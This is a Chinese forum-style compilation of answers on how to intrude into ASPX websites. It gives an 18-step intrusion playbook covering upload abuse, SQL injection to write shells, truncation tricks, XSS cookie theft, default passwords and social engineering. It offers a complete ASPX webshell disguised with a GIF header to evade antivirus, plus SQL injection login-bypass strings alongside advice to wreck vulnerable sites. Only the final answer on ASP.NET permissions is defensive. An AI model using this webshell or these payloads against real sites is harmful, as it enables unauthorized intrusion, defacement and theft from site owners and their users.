文章大纲：

• 1、入侵aspx站要用什么 *** 呢?
• 2、谁有ASPX一句话木马
• 3、ASPX网站入侵的 ***
• 4、入侵中，为什么aspx的文件权限比较大，有什么 *** 可以限制权限，不被入侵？？？待高手。。。。

入侵aspx站要用什么 *** 呢?

1.无论什么站，无论什么语言，我要渗透，之一件事就是扫目录，更好一下扫出个上传点，直接上传shell，诸位不要笑，有时候你花很久搞一个站，最后发现有个现成的上传点，而且很容易猜到，不过这种情况发生在asp居多！

2.asp（aspx）+MSSQL先考虑注入，一般的注入都有DBowner权限可以直接写shell；如果写不了，或者web与数据库分离，那就猜数据，从后台下手了，后台可以上传或者改配置文件；

3.asp（aspx）+ACCESS拿shell一般只有3种 *** ，一是前台上传或者注入进后台上传；二是注入进后台改配置文件；三是注入进后台备份数据库或者暴库后知道是asp或者asa数据库于是直接写一句话；

4.php+MYSQL一般是注入进后台上传，偶尔运气好些权限够高可以注入select into outfile；然后包含，分本地与远程，远程包含在高版本php是不支持的，于是想办法本地上传图片文件或者写到log里；然后php程序某某未公开的漏洞，运气好可以直接写shell。

5.jsp+MYSQL利用数据库拿权限方面基本同php，而且jsp的上传基本很少检查文件后缀，于是只要有注入点与后台，拿shell相当的容易。jsp+ORACLE的站我碰到的不多，碰到的也是猜出用户名与密码从后台下手的。

6.无论什么大站，主站一般都很安全（不然早被人玩了），于是一般从二级域名下手，猜出主站的某些用户名与密码或者搞到主站的源代码，或者旁注得到同网段服务器后cain或arp。

7.一般的大站很少有用现成的CMS的，于是如果你有幸找到源码，那你就发了，注入漏洞啊，上传漏洞啊，写文件漏洞啊，都掌握在你手里。多看看那些大站新出来的测试分站点，那些站还在测试中，可以很轻松拿下。

8.上传有个文件名截断，这包括2个方面，一是00截断，二是长文件名截断（曾经利用这个搞下hw）；然后很多写文件的地方，都可以00，屡试不爽。上传别忘了.asp（当然.asa，.cer，.cdx都可以啦）目录的妙用。

9.php站无论windows还是linux，都有magic_quotes_gpc的问题，magic_quotes_gpc为on的时候，在server变量注入的时候还是可以select into outfile，今年我搞过某未开源cms就是这个情况，一般情况下为on就别考虑写文件了，不过有这个权限别忘了读文件源码，因为load_file的参数是可以编码的。

10.猜路径或者文件在入侵中非常必要，猜不到路径的时候别忘了google（baidu太烂，google很全），于是你可以考虑看站点下的robot.txt或者robots.txt，会有惊喜。

11.工具的使用很重要，入侵之前用WVS扫扫会有助入侵；注入工具虽然很多，但不见得都好使，现在的软硬防火墙、防注入越来越厉害，那时候你就别偷懒，多手工有助你成长。

12.遇到过一流监控么，遇到其他防post的防火墙么，有时候一句话进去了都无法传大马，那时候，你先学学编码，学学变换绕过。

13.想搞一般的小站，记得查看这个小站的版权，找做这个站的公司，然后从这个公司做的其他站下手，得到源码再回头搞，我曾经通过这个 *** 拿下某知名制药的公司站。

14.旁注的思路永远不过时，遇到dbowner的注入，可以很舒服写shell到你需要的站，省得麻烦的提权了；运气不好，按部就班拿shell提权得到你所需。

15.永远别忘记社会工程学，利用社工把自己当成一个什么也不会的人，从某某站长的qq，身份证，邮箱等等下手，也许有时可能会有意外；另外别忘记admin,admin；test,test；123456,123456这种简单的尝试，当然，你也可以暴力破解。

16.别忽视XSS，别忽视cookie，XSS可以偷cookie，更有若干妙用，自己学会领悟；cookie可以伪造登陆，cookie可以注入，cookie注入可以绕绝大多数的防火墙。

17.平时搞站多多搜集路径啊，源码啊，工具啊，充实自己的“武器”库；更好把自己的入侵步骤记录下来，或者事后反思下，我一般都是记在txt里，另外要做到举一反三。

18.多学习，多看源码，多看公布出来的0day，脚本是入侵的前提，而不是工具，会用工具会装B你还没入门。

最后奉劝诸位有事没事改人家首页的装B者，出来混，迟早是要还的，别等进了局子再后悔。还有一点，就是我搞N多站，没挂过一个马，至于很多挂马的人，我不知道该说什么，因为大家都喜欢钱，但是还是少为之吧。

谁有ASPX一句话木马

既然你想要我就给你好了

gif89a

%@ Page language="c#" validateRequest=false %

!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"

HTML

HEAD

titleby qq 4998978/title

meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"

meta content="C#" name="CODE_LANGUAGE"

meta content="JavaScript" name="vs_defaultClientScript"

meta content="" name="vs_targetSchema"

script language="C#" runat="server"

void Page_Load(object sender, System.EventArgs e)

{

string strPath = Server.MapPath(".");

L3.Text = strPath;

}

void Button1_Click(object sender, System.EventArgs e)

{

try

{

System.IO.FileInfo fil = new System.IO.FileInfo(T1.Text);

System.IO.StreamWriter sw = fil.CreateText();

sw.Write(T2.Text);

sw.Flush();

sw.Close();

L4.Text = "文件保存成功!";

}

catch(Exception ex)

{

L4.Text = ex.Message;

}

}

/script

/HEAD

body MS_POSITIONING="GridLayout"

form id="Form1" method="post" runat="server"

asp:Label id="L1" style="Z-INDEX: 101; LEFT: 24px; POSITION: absolute; TOP: 96px" runat="server"本文件绝对路径:/asp:Label

asp:TextBox id="T1" style="Z-INDEX: 102; LEFT: 144px; POSITION: absolute; TOP: 64px" runat="server"

Width="376px"/asp:TextBox

asp:Label id="L2" style="Z-INDEX: 103; LEFT: 24px; POSITION: absolute; TOP: 64px" runat="server"文件保存路径:/asp:Label

asp:Label id="L3" style="Z-INDEX: 104; LEFT: 144px; POSITION: absolute; TOP: 96px" runat="server"

Width="584px"/asp:Label

asp:TextBox id="T2" style="Z-INDEX: 105; LEFT: 24px; POSITION: absolute; TOP: 128px" runat="server"

Width="504px" Height="344px" TextMode="MultiLine"/asp:TextBox

asp:Button id="Button1" style="Z-INDEX: 106; LEFT: 424px; POSITION: absolute; TOP: 504px" runat="server"

Width="96px" Text="保存文件" OnClick="Button1_Click"/asp:Button

asp:Label id="L4" style="Z-INDEX: 107; LEFT: 144px; POSITION: absolute; TOP: 24px" runat="server"

Width="432px"/asp:Label/form

/body

/HTML

保存为：XXX.aspx,这是aspx微型DIY后门,最前面的gif89a是我自己加的，是GIF文件头，可以躲避杀毒,如果你不想要，可以删除

ASPX网站入侵的 ***

这就要看他网站的安全程度了，

你可以先从登录入口试试sql注入 *** ，

如果他没有防sql注入式漏洞的 进去彻底破坏下

用户名： 'or'1'='1'or'1'='1

密码： 1'or'1'='1

如果这个 *** ，不行的话，就要看其它 *** ，把漏洞，如上传小马等等 *** 来实现

但如果对方网站安全性太高了的话，要入侵有难度的

入侵中，为什么aspx的文件权限比较大，有什么 *** 可以限制权限，不被入侵？？？待高手。。。。

aspx使用的是.net技术。IIS 中默认不支持，ASPX需要依赖于.net framework ...ASP只是脚本语言而已。ASP.NET允许用户使用IIS建立 *** 服务。入侵的时候...asp的木马一般是guest权限...APSX的木马一般是users权限...iis6 默认以network service身份运行。iis5默认是aspnet ASP.NET,IIS的权限机制非常复杂，对每一层应用，都有不同的权限控制。总之..要求对asp.net开放相应权限，才可以让你的网站完成相应的服务。ASP.net程序的访问权限由ASPNET的权限来决定。ASPNET隶属于Users组。所以ASPX权限就要高一些...后面那个问题，可以百度了。网上 *** 很多，常见的是根据角色访问控制的基本原理，给用户分配一个角色，每个角色对应一些权限，然后利用ASP.NET中的用户控件来判断该用户对应的角色是否对访问页面有访问的权力。